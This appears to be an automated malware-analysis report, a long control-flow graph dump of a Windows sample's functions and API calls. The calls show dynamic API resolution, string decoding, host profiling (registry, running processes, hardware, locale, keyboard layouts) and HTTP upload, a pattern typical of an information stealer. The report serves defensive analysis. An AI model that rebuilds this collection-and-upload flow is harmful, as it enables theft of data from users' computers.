14722->14723 14724 d4c2d 14723->14724 14725 ea8a0 lstrcpy 14724->14725 14726 d4c36 14725->14726 14727 ea9b0 4 API calls 14726->14727 14728 d4c55 14727->14728 14729 ea8a0 lstrcpy 14728->14729 14730 d4c5e 14729->14730 14731 ea9b0 4 API calls 14730->14731 14732 d4c7d 14731->14732 14733 ea8a0 lstrcpy 14732->14733 14734 d4c86 14733->14734 14735 ea920 3 API calls 14734->14735 14736 d4ca4 14735->14736 14737 ea8a0 lstrcpy 14736->14737 14738 d4cad 14737->14738 14739 ea9b0 4 API calls 14738->14739 14740 d4ccc 14739->14740 14741 ea8a0 lstrcpy 14740->14741 14742 d4cd5 14741->14742 14743 ea9b0 4 API calls 14742->14743 14744 d4cf6 14743->14744 14745 ea8a0 lstrcpy 14744->14745 14746 d4cff 14745->14746 14747 ea9b0 4 API calls 14746->14747 14748 d4d1f 14747->14748 14749 ea8a0 lstrcpy 14748->14749 14750 d4d28 14749->14750 14751 ea9b0 4 API calls 14750->14751 14752 d4d47 14751->14752 14753 ea8a0 lstrcpy 14752->14753 14754 d4d50 14753->14754 14755 ea920 3 API calls 14754->14755 14756 d4d6e 14755->14756 14757 ea8a0 lstrcpy 14756->14757 14758 d4d77 14757->14758 14759 ea740 lstrcpy 14758->14759 14760 d4d92 14759->14760 14761 ea920 3 API calls 14760->14761 14762 d4db3 14761->14762 14763 ea920 3 API calls 14762->14763 14764 d4dba 14763->14764 14765 ea8a0 lstrcpy 14764->14765 14766 d4dc6 14765->14766 14767 d4de7 lstrlen 14766->14767 14768 d4dfa 14767->14768 14769 d4e03 lstrlen 14768->14769 15706 eaad0 14769->15706 14771 d4e13 HttpSendRequestA 14772 d4e32 InternetReadFile 14771->14772 14773 d4e67 InternetCloseHandle 14772->14773 14778 d4e5e 14772->14778 14776 ea800 14773->14776 14775 ea9b0 4 API calls 14775->14778 14776->14697 14777 ea8a0 lstrcpy 14777->14778 14778->14772 14778->14773 14778->14775 14778->14777 15713 eaad0 14779->15713 14781 e17c4 StrCmpCA 14782 e17cf ExitProcess 14781->14782 14786 e17d7 14781->14786 14783 e19c2 14783->13702 14784 e18cf StrCmpCA 14784->14786 14785 e18ad StrCmpCA 14785->14786 14786->14783 14786->14784 14786->14785 14787 e187f StrCmpCA 14786->14787 14788 e185d 
StrCmpCA 14786->14788 14789 e1932 StrCmpCA 14786->14789 14790 e1913 StrCmpCA 14786->14790 14791 e1970 StrCmpCA 14786->14791 14792 e18f1 StrCmpCA 14786->14792 14793 e1951 StrCmpCA 14786->14793 14794 ea820 lstrlen lstrcpy 14786->14794 14787->14786 14788->14786 14789->14786 14790->14786 14791->14786 14792->14786 14793->14786 14794->14786 14796 ea7a0 lstrcpy 14795->14796 14797 d5979 14796->14797 14798 d47b0 2 API calls 14797->14798 14799 d5985 14798->14799 14800 ea740 lstrcpy 14799->14800 14801 d59ba 14800->14801 14802 ea740 lstrcpy 14801->14802 14803 d59c7 14802->14803 14804 ea740 lstrcpy 14803->14804 14805 d59d4 14804->14805 14806 ea740 lstrcpy 14805->14806 14807 d59e1 14806->14807 14808 ea740 lstrcpy 14807->14808 14809 d59ee InternetOpenA StrCmpCA 14808->14809 14810 d5a1d 14809->14810 14811 d5fc3 InternetCloseHandle 14810->14811 14812 e8b60 3 API calls 14810->14812 14813 d5fe0 14811->14813 14814 d5a3c 14812->14814 14816 d9ac0 4 API calls 14813->14816 14815 ea920 3 API calls 14814->14815 14817 d5a4f 14815->14817 14818 d5fe6 14816->14818 14819 ea8a0 lstrcpy 14817->14819 14820 ea820 2 API calls 14818->14820 14827 d601f ctype 14818->14827 14826 d5a58 14819->14826 14821 d5ffd 14820->14821 14822 ea9b0 4 API calls 14821->14822 14823 d6013 14822->14823 14824 ea8a0 lstrcpy 14823->14824 14824->14827 14825 ea7a0 lstrcpy 14836 d604f 14825->14836 14828 ea9b0 4 API calls 14826->14828 14827->14825 14829 d5a82 14828->14829 14830 ea8a0 lstrcpy 14829->14830 14831 d5a8b 14830->14831 14832 ea9b0 4 API calls 14831->14832 14833 d5aaa 14832->14833 14834 ea8a0 lstrcpy 14833->14834 14835 d5ab3 14834->14835 14837 ea920 3 API calls 14835->14837 14836->13708 14838 d5ad1 14837->14838 14839 ea8a0 lstrcpy 14838->14839 14840 d5ada 14839->14840 14841 ea9b0 4 API calls 14840->14841 14842 d5af9 14841->14842 14843 ea8a0 lstrcpy 14842->14843 14844 d5b02 14843->14844 14845 ea9b0 4 API calls 14844->14845 14846 d5b21 14845->14846 14847 ea8a0 lstrcpy 14846->14847 14848 d5b2a 14847->14848 14849 ea9b0 4 API 
calls 14848->14849 14850 d5b56 14849->14850 14851 ea920 3 API calls 14850->14851 14852 d5b5d 14851->14852 14853 ea8a0 lstrcpy 14852->14853 14854 d5b66 14853->14854 14855 d5b7c InternetConnectA 14854->14855 14855->14811 14856 d5bac HttpOpenRequestA 14855->14856 14858 d5c0b 14856->14858 14859 d5fb6 InternetCloseHandle 14856->14859 14860 ea9b0 4 API calls 14858->14860 14859->14811 14861 d5c1f 14860->14861 14862 ea8a0 lstrcpy 14861->14862 14863 d5c28 14862->14863 14864 ea920 3 API calls 14863->14864 14865 d5c46 14864->14865 14866 ea8a0 lstrcpy 14865->14866 14867 d5c4f 14866->14867 14868 ea9b0 4 API calls 14867->14868 14869 d5c6e 14868->14869 14870 ea8a0 lstrcpy 14869->14870 14871 d5c77 14870->14871 14872 ea9b0 4 API calls 14871->14872 14873 d5c98 14872->14873 14874 ea8a0 lstrcpy 14873->14874 14875 d5ca1 14874->14875 14876 ea9b0 4 API calls 14875->14876 14877 d5cc1 14876->14877 14878 ea8a0 lstrcpy 14877->14878 14879 d5cca 14878->14879 14880 ea9b0 4 API calls 14879->14880 14881 d5ce9 14880->14881 14882 ea8a0 lstrcpy 14881->14882 14883 d5cf2 14882->14883 14884 ea920 3 API calls 14883->14884 14885 d5d10 14884->14885 14886 ea8a0 lstrcpy 14885->14886 14887 d5d19 14886->14887 14888 ea9b0 4 API calls 14887->14888 14889 d5d38 14888->14889 14890 ea8a0 lstrcpy 14889->14890 14891 d5d41 14890->14891 14892 ea9b0 4 API calls 14891->14892 14893 d5d60 14892->14893 14894 ea8a0 lstrcpy 14893->14894 14895 d5d69 14894->14895 14896 ea920 3 API calls 14895->14896 14897 d5d87 14896->14897 14898 ea8a0 lstrcpy 14897->14898 14899 d5d90 14898->14899 14900 ea9b0 4 API calls 14899->14900 14901 d5daf 14900->14901 14902 ea8a0 lstrcpy 14901->14902 14903 d5db8 14902->14903 14904 ea9b0 4 API calls 14903->14904 14905 d5dd9 14904->14905 14906 ea8a0 lstrcpy 14905->14906 14907 d5de2 14906->14907 14908 ea9b0 4 API calls 14907->14908 14909 d5e02 14908->14909 14910 ea8a0 lstrcpy 14909->14910 14911 d5e0b 14910->14911 14912 ea9b0 4 API calls 14911->14912 14913 d5e2a 14912->14913 14914 ea8a0 lstrcpy 14913->14914 
14915 d5e33 14914->14915 14916 ea920 3 API calls 14915->14916 14917 d5e54 14916->14917 14918 ea8a0 lstrcpy 14917->14918 14919 d5e5d 14918->14919 14920 d5e70 lstrlen 14919->14920 15714 eaad0 14920->15714 14922 d5e81 lstrlen GetProcessHeap RtlAllocateHeap 15715 eaad0 14922->15715 14924 d5eae lstrlen 14925 d5ebe 14924->14925 14926 d5ed7 lstrlen 14925->14926 14927 d5ee7 14926->14927 14928 d5ef0 lstrlen 14927->14928 14929 d5f04 14928->14929 14930 d5f1a lstrlen 14929->14930 15716 eaad0 14930->15716 14932 d5f2a HttpSendRequestA 14933 d5f35 InternetReadFile 14932->14933 14934 d5f6a InternetCloseHandle 14933->14934 14938 d5f61 14933->14938 14934->14859 14936 ea9b0 4 API calls 14936->14938 14937 ea8a0 lstrcpy 14937->14938 14938->14933 14938->14934 14938->14936 14938->14937 14940 e1077 14939->14940 14941 e1151 14940->14941 14942 ea820 lstrlen lstrcpy 14940->14942 14941->13710 14942->14940 14948 e0db7 14943->14948 14944 e0f17 14944->13718 14945 e0e27 StrCmpCA 14945->14948 14946 e0e67 StrCmpCA 14946->14948 14947 e0ea4 StrCmpCA 14947->14948 14948->14944 14948->14945 14948->14946 14948->14947 14949 ea820 lstrlen lstrcpy 14948->14949 14949->14948 14953 e0f67 14950->14953 14951 e1044 14951->13726 14952 e0fb2 StrCmpCA 14952->14953 14953->14951 14953->14952 14954 ea820 lstrlen lstrcpy 14953->14954 14954->14953 14956 ea740 lstrcpy 14955->14956 14957 e1a26 14956->14957 14958 ea9b0 4 API calls 14957->14958 14959 e1a37 14958->14959 14960 ea8a0 lstrcpy 14959->14960 14961 e1a40 14960->14961 14962 ea9b0 4 API calls 14961->14962 14963 e1a5b 14962->14963 14964 ea8a0 lstrcpy 14963->14964 14965 e1a64 14964->14965 14966 ea9b0 4 API calls 14965->14966 14967 e1a7d 14966->14967 14968 ea8a0 lstrcpy 14967->14968 14969 e1a86 14968->14969 14970 ea9b0 4 API calls 14969->14970 14971 e1aa1 14970->14971 14972 ea8a0 lstrcpy 14971->14972 14973 e1aaa 14972->14973 14974 ea9b0 4 API calls 14973->14974 14975 e1ac3 14974->14975 14976 ea8a0 lstrcpy 14975->14976 14977 e1acc 14976->14977 14978 ea9b0 4 API calls 
14977->14978 14979 e1ae7 14978->14979 14980 ea8a0 lstrcpy 14979->14980 14981 e1af0 14980->14981 14982 ea9b0 4 API calls 14981->14982 14983 e1b09 14982->14983 14984 ea8a0 lstrcpy 14983->14984 14985 e1b12 14984->14985 14986 ea9b0 4 API calls 14985->14986 14987 e1b2d 14986->14987 14988 ea8a0 lstrcpy 14987->14988 14989 e1b36 14988->14989 14990 ea9b0 4 API calls 14989->14990 14991 e1b4f 14990->14991 14992 ea8a0 lstrcpy 14991->14992 14993 e1b58 14992->14993 14994 ea9b0 4 API calls 14993->14994 14995 e1b76 14994->14995 14996 ea8a0 lstrcpy 14995->14996 14997 e1b7f 14996->14997 14998 e7500 6 API calls 14997->14998 14999 e1b96 14998->14999 15000 ea920 3 API calls 14999->15000 15001 e1ba9 15000->15001 15002 ea8a0 lstrcpy 15001->15002 15003 e1bb2 15002->15003 15004 ea9b0 4 API calls 15003->15004 15005 e1bdc 15004->15005 15006 ea8a0 lstrcpy 15005->15006 15007 e1be5 15006->15007 15008 ea9b0 4 API calls 15007->15008 15009 e1c05 15008->15009 15010 ea8a0 lstrcpy 15009->15010 15011 e1c0e 15010->15011 15717 e7690 GetProcessHeap RtlAllocateHeap 15011->15717 15014 ea9b0 4 API calls 15015 e1c2e 15014->15015 15016 ea8a0 lstrcpy 15015->15016 15017 e1c37 15016->15017 15018 ea9b0 4 API calls 15017->15018 15019 e1c56 15018->15019 15020 ea8a0 lstrcpy 15019->15020 15021 e1c5f 15020->15021 15022 ea9b0 4 API calls 15021->15022 15023 e1c80 15022->15023 15024 ea8a0 lstrcpy 15023->15024 15025 e1c89 15024->15025 15724 e77c0 GetCurrentProcess IsWow64Process 15025->15724 15028 ea9b0 4 API calls 15029 e1ca9 15028->15029 15030 ea8a0 lstrcpy 15029->15030 15031 e1cb2 15030->15031 15032 ea9b0 4 API calls 15031->15032 15033 e1cd1 15032->15033 15034 ea8a0 lstrcpy 15033->15034 15035 e1cda 15034->15035 15036 ea9b0 4 API calls 15035->15036 15037 e1cfb 15036->15037 15038 ea8a0 lstrcpy 15037->15038 15039 e1d04 15038->15039 15040 e7850 3 API calls 15039->15040 15041 e1d14 15040->15041 15042 ea9b0 4 API calls 15041->15042 15043 e1d24 15042->15043 15044 ea8a0 lstrcpy 15043->15044 15045 e1d2d 15044->15045 15046 ea9b0 
4 API calls 15045->15046 15047 e1d4c 15046->15047 15048 ea8a0 lstrcpy 15047->15048 15049 e1d55 15048->15049 15050 ea9b0 4 API calls 15049->15050 15051 e1d75 15050->15051 15052 ea8a0 lstrcpy 15051->15052 15053 e1d7e 15052->15053 15054 e78e0 3 API calls 15053->15054 15055 e1d8e 15054->15055 15056 ea9b0 4 API calls 15055->15056 15057 e1d9e 15056->15057 15058 ea8a0 lstrcpy 15057->15058 15059 e1da7 15058->15059 15060 ea9b0 4 API calls 15059->15060 15061 e1dc6 15060->15061 15062 ea8a0 lstrcpy 15061->15062 15063 e1dcf 15062->15063 15064 ea9b0 4 API calls 15063->15064 15065 e1df0 15064->15065 15066 ea8a0 lstrcpy 15065->15066 15067 e1df9 15066->15067 15726 e7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15067->15726 15070 ea9b0 4 API calls 15071 e1e19 15070->15071 15072 ea8a0 lstrcpy 15071->15072 15073 e1e22 15072->15073 15074 ea9b0 4 API calls 15073->15074 15075 e1e41 15074->15075 15076 ea8a0 lstrcpy 15075->15076 15077 e1e4a 15076->15077 15078 ea9b0 4 API calls 15077->15078 15079 e1e6b 15078->15079 15080 ea8a0 lstrcpy 15079->15080 15081 e1e74 15080->15081 15728 e7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15081->15728 15084 ea9b0 4 API calls 15085 e1e94 15084->15085 15086 ea8a0 lstrcpy 15085->15086 15087 e1e9d 15086->15087 15088 ea9b0 4 API calls 15087->15088 15089 e1ebc 15088->15089 15090 ea8a0 lstrcpy 15089->15090 15091 e1ec5 15090->15091 15092 ea9b0 4 API calls 15091->15092 15093 e1ee5 15092->15093 15094 ea8a0 lstrcpy 15093->15094 15095 e1eee 15094->15095 15731 e7b00 GetUserDefaultLocaleName 15095->15731 15098 ea9b0 4 API calls 15099 e1f0e 15098->15099 15100 ea8a0 lstrcpy 15099->15100 15101 e1f17 15100->15101 15102 ea9b0 4 API calls 15101->15102 15103 e1f36 15102->15103 15104 ea8a0 lstrcpy 15103->15104 15105 e1f3f 15104->15105 15106 ea9b0 4 API calls 15105->15106 15107 e1f60 15106->15107 15108 ea8a0 lstrcpy 15107->15108 15109 e1f69 15108->15109 15735 e7b90 15109->15735 15111 e1f80 15112 ea920 3 API calls 15111->15112 15113 e1f93 15112->15113 
15114 ea8a0 lstrcpy 15113->15114 15115 e1f9c 15114->15115 15116 ea9b0 4 API calls 15115->15116 15117 e1fc6 15116->15117 15118 ea8a0 lstrcpy 15117->15118 15119 e1fcf 15118->15119 15120 ea9b0 4 API calls 15119->15120 15121 e1fef 15120->15121 15122 ea8a0 lstrcpy 15121->15122 15123 e1ff8 15122->15123 15747 e7d80 GetSystemPowerStatus 15123->15747 15126 ea9b0 4 API calls 15127 e2018 15126->15127 15128 ea8a0 lstrcpy 15127->15128 15129 e2021 15128->15129 15130 ea9b0 4 API calls 15129->15130 15131 e2040 15130->15131 15132 ea8a0 lstrcpy 15131->15132 15133 e2049 15132->15133 15134 ea9b0 4 API calls 15133->15134 15135 e206a 15134->15135 15136 ea8a0 lstrcpy 15135->15136 15137 e2073 15136->15137 15138 e207e GetCurrentProcessId 15137->15138 15749 e9470 OpenProcess 15138->15749 15141 ea920 3 API calls 15142 e20a4 15141->15142 15143 ea8a0 lstrcpy 15142->15143 15144 e20ad 15143->15144 15145 ea9b0 4 API calls 15144->15145 15146 e20d7 15145->15146 15147 ea8a0 lstrcpy 15146->15147 15148 e20e0 15147->15148 15149 ea9b0 4 API calls 15148->15149 15150 e2100 15149->15150 15151 ea8a0 lstrcpy 15150->15151 15152 e2109 15151->15152 15754 e7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15152->15754 15155 ea9b0 4 API calls 15156 e2129 15155->15156 15157 ea8a0 lstrcpy 15156->15157 15158 e2132 15157->15158 15159 ea9b0 4 API calls 15158->15159 15160 e2151 15159->15160 15161 ea8a0 lstrcpy 15160->15161 15162 e215a 15161->15162 15163 ea9b0 4 API calls 15162->15163 15164 e217b 15163->15164 15165 ea8a0 lstrcpy 15164->15165 15166 e2184 15165->15166 15758 e7f60 15166->15758 15169 ea9b0 4 API calls 15170 e21a4 15169->15170 15171 ea8a0 lstrcpy 15170->15171 15172 e21ad 15171->15172 15173 ea9b0 4 API calls 15172->15173 15174 e21cc 15173->15174 15175 ea8a0 lstrcpy 15174->15175 15176 e21d5 15175->15176 15177 ea9b0 4 API calls 15176->15177 15178 e21f6 15177->15178 15179 ea8a0 lstrcpy 15178->15179 15180 e21ff 15179->15180 15771 e7ed0 GetSystemInfo wsprintfA 15180->15771 15183 ea9b0 4 API calls 15184 e221f 
15183->15184 15185 ea8a0 lstrcpy 15184->15185 15186 e2228 15185->15186 15187 ea9b0 4 API calls 15186->15187 15188 e2247 15187->15188 15189 ea8a0 lstrcpy 15188->15189 15190 e2250 15189->15190 15191 ea9b0 4 API calls 15190->15191 15192 e2270 15191->15192 15193 ea8a0 lstrcpy 15192->15193 15194 e2279 15193->15194 15773 e8100 GetProcessHeap RtlAllocateHeap 15194->15773 15197 ea9b0 4 API calls 15198 e2299 15197->15198 15199 ea8a0 lstrcpy 15198->15199 15200 e22a2 15199->15200 15201 ea9b0 4 API calls 15200->15201 15202 e22c1 15201->15202 15203 ea8a0 lstrcpy 15202->15203 15204 e22ca 15203->15204 15205 ea9b0 4 API calls 15204->15205 15206 e22eb 15205->15206 15207 ea8a0 lstrcpy 15206->15207 15208 e22f4 15207->15208 15779 e87c0 15208->15779 15211 ea920 3 API calls 15212 e231e 15211->15212 15213 ea8a0 lstrcpy 15212->15213 15214 e2327 15213->15214 15215 ea9b0 4 API calls 15214->15215 15216 e2351 15215->15216 15217 ea8a0 lstrcpy 15216->15217 15218 e235a 15217->15218 15219 ea9b0 4 API calls 15218->15219 15220 e237a 15219->15220 15221 ea8a0 lstrcpy 15220->15221 15222 e2383 15221->15222 15223 ea9b0 4 API calls 15222->15223 15224 e23a2 15223->15224 15225 ea8a0 lstrcpy 15224->15225 15226 e23ab 15225->15226 15784 e81f0 15226->15784 15228 e23c2 15229 ea920 3 API calls 15228->15229 15230 e23d5 15229->15230 15231 ea8a0 lstrcpy 15230->15231 15232 e23de 15231->15232 15233 ea9b0 4 API calls 15232->15233 15234 e240a 15233->15234 15235 ea8a0 lstrcpy 15234->15235 15236 e2413 15235->15236 15237 ea9b0 4 API calls 15236->15237 15238 e2432 15237->15238 15239 ea8a0 lstrcpy 15238->15239 15240 e243b 15239->15240 15241 ea9b0 4 API calls 15240->15241 15242 e245c 15241->15242 15243 ea8a0 lstrcpy 15242->15243 15244 e2465 15243->15244 15245 ea9b0 4 API calls 15244->15245 15246 e2484 15245->15246 15247 ea8a0 lstrcpy 15246->15247 15248 e248d 15247->15248 15249 ea9b0 4 API calls 15248->15249 15250 e24ae 15249->15250 15251 ea8a0 lstrcpy 15250->15251 15252 e24b7 15251->15252 15792 e8320 15252->15792 15254 e24d3 
15255 ea920 3 API calls 15254->15255 15256 e24e6 15255->15256 15257 ea8a0 lstrcpy 15256->15257 15258 e24ef 15257->15258 15259 ea9b0 4 API calls 15258->15259 15260 e2519 15259->15260 15261 ea8a0 lstrcpy 15260->15261 15262 e2522 15261->15262 15263 ea9b0 4 API calls 15262->15263 15264 e2543 15263->15264 15265 ea8a0 lstrcpy 15264->15265 15266 e254c 15265->15266 15267 e8320 17 API calls 15266->15267 15268 e2568 15267->15268 15269 ea920 3 API calls 15268->15269 15270 e257b 15269->15270 15271 ea8a0 lstrcpy 15270->15271 15272 e2584 15271->15272 15273 ea9b0 4 API calls 15272->15273 15274 e25ae 15273->15274 15275 ea8a0 lstrcpy 15274->15275 15276 e25b7 15275->15276 15277 ea9b0 4 API calls 15276->15277 15278 e25d6 15277->15278 15279 ea8a0 lstrcpy 15278->15279 15280 e25df 15279->15280 15281 ea9b0 4 API calls 15280->15281 15282 e2600 15281->15282 15283 ea8a0 lstrcpy 15282->15283 15284 e2609 15283->15284 15828 e8680 15284->15828 15286 e2620 15287 ea920 3 API calls 15286->15287 15288 e2633 15287->15288 15289 ea8a0 lstrcpy 15288->15289 15290 e263c 15289->15290 15291 e265a lstrlen 15290->15291 15292 e266a 15291->15292 15293 ea740 lstrcpy 15292->15293 15294 e267c 15293->15294 15295 d1590 lstrcpy 15294->15295 15296 e268d 15295->15296 15838 e5190 15296->15838 15298 e2699 15298->13730 16026 eaad0 15299->16026 15301 d5009 InternetOpenUrlA 15305 d5021 15301->15305 15302 d502a InternetReadFile 15302->15305 15303 d50a0 InternetCloseHandle InternetCloseHandle 15304 d50ec 15303->15304 15304->13734 15305->15302 15305->15303 16027 d98d0 15306->16027 15308 e0759 15309 e077d 15308->15309 15310 e0a38 15308->15310 15312 e0799 StrCmpCA 15309->15312 15311 d1590 lstrcpy 15310->15311 15313 e0a49 15311->15313 15315 e07a8 15312->15315 15341 e0843 15312->15341 16203 e0250 15313->16203 15317 ea7a0 lstrcpy 15315->15317 15319 e07c3 15317->15319 15318 e0865 StrCmpCA 15320 e0874 15318->15320 15358 e096b 15318->15358 15321 d1590 lstrcpy 15319->15321 15322 ea740 lstrcpy 15320->15322 15323 e080c 15321->15323 
15325 e0881 15322->15325 15326 ea7a0 lstrcpy 15323->15326 15324 e099c StrCmpCA 15327 e09ab 15324->15327 15347 e0a2d 15324->15347 15328 ea9b0 4 API calls 15325->15328 15329 e0823 15326->15329 15330 d1590 lstrcpy 15327->15330 15331 e08ac 15328->15331 15332 ea7a0 lstrcpy 15329->15332 15333 e09f4 15330->15333 15334 ea920 3 API calls 15331->15334 15335 e083e 15332->15335 15336 ea7a0 lstrcpy 15333->15336 15337 e08b3 15334->15337 16030 dfb00 15335->16030 15339 e0a0d 15336->15339 15340 ea9b0 4 API calls 15337->15340 15342 ea7a0 lstrcpy 15339->15342 15343 e08ba 15340->15343 15341->15318 15344 e0a28 15342->15344 16146 e0030 15344->16146 15347->13738 15358->15324 15678 ea7a0 lstrcpy 15677->15678 15679 d1683 15678->15679 15680 ea7a0 lstrcpy 15679->15680 15681 d1695 15680->15681 15682 ea7a0 lstrcpy 15681->15682 15683 d16a7 15682->15683 15684 ea7a0 lstrcpy 15683->15684 15685 d15a3 15684->15685 15685->14561 15687 d47c6 15686->15687 15688 d4838 lstrlen 15687->15688 15712 eaad0 15688->15712 15690 d4848 InternetCrackUrlA 15691 d4867 15690->15691 15691->14638 15693 ea740 lstrcpy 15692->15693 15694 e8b74 15693->15694 15695 ea740 lstrcpy 15694->15695 15696 e8b82 GetSystemTime 15695->15696 15697 e8b99 15696->15697 15698 ea7a0 lstrcpy 15697->15698 15699 e8bfc 15698->15699 15699->14653 15701 ea931 15700->15701 15702 ea988 15701->15702 15704 ea968 lstrcpy lstrcat 15701->15704 15703 ea7a0 lstrcpy 15702->15703 15705 ea994 15703->15705 15704->15702 15705->14656 15706->14771 15708 d9af9 LocalAlloc 15707->15708 15709 d4eee 15707->15709 15708->15709 15710 d9b14 CryptStringToBinaryA 15708->15710 15709->14659 15709->14662 15710->15709 15711 d9b39 LocalFree 15710->15711 15711->15709 15712->15690 15713->14781 15714->14922 15715->14924 15716->14932 15845 e77a0 15717->15845 15720 e1c1e 15720->15014 15721 e76c6 RegOpenKeyExA 15722 e76e7 RegQueryValueExA 15721->15722 15723 e7704 RegCloseKey 15721->15723 15722->15723 15723->15720 15725 e1c99 15724->15725 15725->15028 15727 e1e09 15726->15727 15727->15070 
15729 e7a9a wsprintfA 15728->15729 15730 e1e84 15728->15730 15729->15730 15730->15084 15732 e7b4d 15731->15732 15733 e1efe 15731->15733 15852 e8d20 LocalAlloc CharToOemW 15732->15852 15733->15098 15736 ea740 lstrcpy 15735->15736 15737 e7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15736->15737 15746 e7c25 15737->15746 15738 e7d18 15740 e7d1e LocalFree 15738->15740 15741 e7d28 15738->15741 15739 e7c46 GetLocaleInfoA 15739->15746 15740->15741 15742 ea7a0 lstrcpy 15741->15742 15745 e7d37 15742->15745 15743 ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15743->15746 15744 ea8a0 lstrcpy 15744->15746 15745->15111 15746->15738 15746->15739 15746->15743 15746->15744 15748 e2008 15747->15748 15748->15126 15750 e94b5 15749->15750 15751 e9493 GetModuleFileNameExA CloseHandle 15749->15751 15752 ea740 lstrcpy 15750->15752 15751->15750 15753 e2091 15752->15753 15753->15141 15755 e7e68 RegQueryValueExA 15754->15755 15756 e2119 15754->15756 15757 e7e8e RegCloseKey 15755->15757 15756->15155 15757->15756 15759 e7fb9 GetLogicalProcessorInformationEx 15758->15759 15760 e7fd8 GetLastError 15759->15760 15761 e8029 15759->15761 15763 e8022 15760->15763 15770 e7fe3 15760->15770 15766 e89f0 2 API calls 15761->15766 15762 e2194 15762->15169 15763->15762 15767 e89f0 2 API calls 15763->15767 15768 e807b 15766->15768 15767->15762 15768->15763 15769 e8084 wsprintfA 15768->15769 15769->15762 15770->15759 15770->15762 15853 e89f0 15770->15853 15856 e8a10 GetProcessHeap RtlAllocateHeap 15770->15856 15772 e220f 15771->15772 15772->15183 15774 e89b0 15773->15774 15775 e814d GlobalMemoryStatusEx 15774->15775 15777 e8163 __aulldiv 15775->15777 15776 e819b wsprintfA 15778 e2289 15776->15778 15777->15776 15778->15197 15780 e87fb GetProcessHeap RtlAllocateHeap wsprintfA 15779->15780 15782 ea740 lstrcpy 15780->15782 15783 e230b 15782->15783 15783->15211 15785 ea740 lstrcpy 15784->15785 15791 e8229 15785->15791 15786 e8263 15788 ea7a0 lstrcpy 15786->15788 15787 ea9b0 lstrcpy lstrlen lstrcpy lstrcat 
15787->15791 15789 e82dc 15788->15789 15789->15228 15790 ea8a0 lstrcpy 15790->15791 15791->15786 15791->15787 15791->15790 15793 ea740 lstrcpy 15792->15793 15794 e835c RegOpenKeyExA 15793->15794 15795 e83ae 15794->15795 15796 e83d0 15794->15796 15797 ea7a0 lstrcpy 15795->15797 15798 e83f8 RegEnumKeyExA 15796->15798 15799 e8613 RegCloseKey 15796->15799 15808 e83bd 15797->15808 15800 e860e 15798->15800 15801 e843f wsprintfA RegOpenKeyExA 15798->15801 15802 ea7a0 lstrcpy 15799->15802 15800->15799 15803 e8485 RegCloseKey RegCloseKey 15801->15803 15804 e84c1 RegQueryValueExA 15801->15804 15802->15808 15805 ea7a0 lstrcpy 15803->15805 15806 e84fa lstrlen 15804->15806 15807 e8601 RegCloseKey 15804->15807 15805->15808 15806->15807 15809 e8510 15806->15809 15807->15800 15808->15254 15810 ea9b0 4 API calls 15809->15810 15811 e8527 15810->15811 15812 ea8a0 lstrcpy 15811->15812 15813 e8533 15812->15813 15814 ea9b0 4 API calls 15813->15814 15815 e8557 15814->15815 15816 ea8a0 lstrcpy 15815->15816 15817 e8563 15816->15817 15818 e856e RegQueryValueExA 15817->15818 15818->15807 15819 e85a3 15818->15819 15820 ea9b0 4 API calls 15819->15820 15821 e85ba 15820->15821 15822 ea8a0 lstrcpy 15821->15822 15823 e85c6 15822->15823 15824 ea9b0 4 API calls 15823->15824 15825 e85ea 15824->15825 15826 ea8a0 lstrcpy 15825->15826 15827 e85f6 15826->15827 15827->15807 15829 ea740 lstrcpy 15828->15829 15830 e86bc CreateToolhelp32Snapshot Process32First 15829->15830 15831 e875d CloseHandle 15830->15831 15832 e86e8 Process32Next 15830->15832 15833 ea7a0 lstrcpy 15831->15833 15832->15831 15837 e86fd 15832->15837 15835 e8776 15833->15835 15834 ea8a0 lstrcpy 15834->15837 15835->15286 15836 ea9b0 lstrcpy lstrlen lstrcpy lstrcat 15836->15837 15837->15832 15837->15834 15837->15836 15839 ea7a0 lstrcpy 15838->15839 15840 e51b5 15839->15840 15841 d1590 lstrcpy 15840->15841 15842 e51c6 15841->15842 15857 d5100 15842->15857 15844 e51cf 15844->15298 15848 e7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 
Control-flow graph (continuation of the preceding function group; the node/edge dump of the interactive graph is condensed here to the basic blocks that call APIs):
• e7765 RegQueryValueExA; e7780 RegCloseKey
• ea7a0 / ea740 lstrcpy; d5192 lstrlen; d51fd InternetOpenA, StrCmpCA; d5329 InternetConnectA; d5359 HttpOpenRequestA; d58b7 / d58c4 InternetCloseHandle
• e89f9 GetProcessHeap, HeapFree; e8a10 GetProcessHeap, RtlAllocateHeap
• e8ead CryptBinaryToStringA, e8ece GetProcessHeap, RtlAllocateHeap, e8f05 CryptBinaryToStringA (query size, allocate, encode)
• d668f / d6743 VirtualAlloc; d6a09 LoadLibraryA; d6ba8 GetProcAddress; d6ee6 VirtualFree; d6f26 FreeLibrary

Control-flow graph for e9860 (interactive in the original report; basic blocks listed with their API calls):
• e9860-e9874: call e9750; branches either to e987a or straight to e9a93
• e987a-e9a8e: call e9780, then GetProcAddress x21
• e9a93-e9af2: LoadLibraryA x5
• e9af4-e9b08: GetProcAddress; e9b16-e9b41: GetProcAddress x2; e9b4f-e9b63: GetProcAddress; e9b71-e9b84: GetProcAddress; e9b92-e9bbc: GetProcAddress x2
• each of those five resolution blocks is entered from a short branch block (e9b0d, e9b46, e9b68, e9b89) that can also skip it
• e9bc1-e9bc2: exit
                                    APIs
                                    • GetProcAddress.KERNEL32(76210000,00B68A60), ref: 000E98A1
                                    • GetProcAddress.KERNEL32(76210000,00B68970), ref: 000E98BA
                                    • GetProcAddress.KERNEL32(76210000,00B689A0), ref: 000E98D2
                                    • GetProcAddress.KERNEL32(76210000,00B68A18), ref: 000E98EA
                                    • GetProcAddress.KERNEL32(76210000,00B688F8), ref: 000E9903
                                    • GetProcAddress.KERNEL32(76210000,00B79278), ref: 000E991B
                                    • GetProcAddress.KERNEL32(76210000,00B65068), ref: 000E9933
                                    • GetProcAddress.KERNEL32(76210000,00B651C8), ref: 000E994C
                                    • GetProcAddress.KERNEL32(76210000,00B68988), ref: 000E9964
                                    • GetProcAddress.KERNEL32(76210000,00B68B20), ref: 000E997C
                                    • GetProcAddress.KERNEL32(76210000,00B68850), ref: 000E9995
